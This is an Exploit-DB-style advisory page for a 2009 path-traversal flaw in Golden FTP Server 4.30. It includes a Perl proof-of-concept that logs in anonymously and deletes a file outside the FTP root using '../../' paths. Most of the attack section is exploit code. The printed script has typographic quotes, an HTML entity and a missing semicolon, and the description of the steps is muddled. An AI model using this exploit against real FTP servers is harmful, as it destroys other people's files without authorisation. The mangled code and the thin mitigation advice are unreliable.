Golden FTP Server File Deletion Vulnerability

vendor:

Golden FTP Server

by:

sharpe

N/A

CVSS

N/A

File Deletion Vulnerability

N/A

CWE

Product Name: Golden FTP Server

Affected Version From: 4.30 Free and Professional

Affected Version To: 4.30 Free and Professional

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2009

Golden FTP Server File Deletion Vulnerability

A vulnerability in Golden FTP Server 4.30 Free and Professional allows an attacker to delete files outside of the FTP root directory. This is achieved by using the FTP command CWD to change the working directory to the FTP root directory, and then using the FTP command DELE to delete a file outside of the FTP root directory. This can be done by using a relative path, such as '../../bollocks.txt'.

Mitigation:

The vulnerability can be mitigated by ensuring that the FTP root directory is set to a directory that does not contain any sensitive files.

Source

Exploit-DB raw data:

# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]

#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/

use strict;
use Net::FTP

my $ftp = Net::FTP->new(”192.168.1.35&#8243;, Debug => 1) || die $@;

$ftp->login(”anonymous”, ‘anonymous@local.host’) || die $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(”/public/”) || die $ftp->message;

# This deletes the file C:\bollocks.txt
$ftp->delete(”../../bollocks.txt”);

$ftp->quit;

$ftp = undef;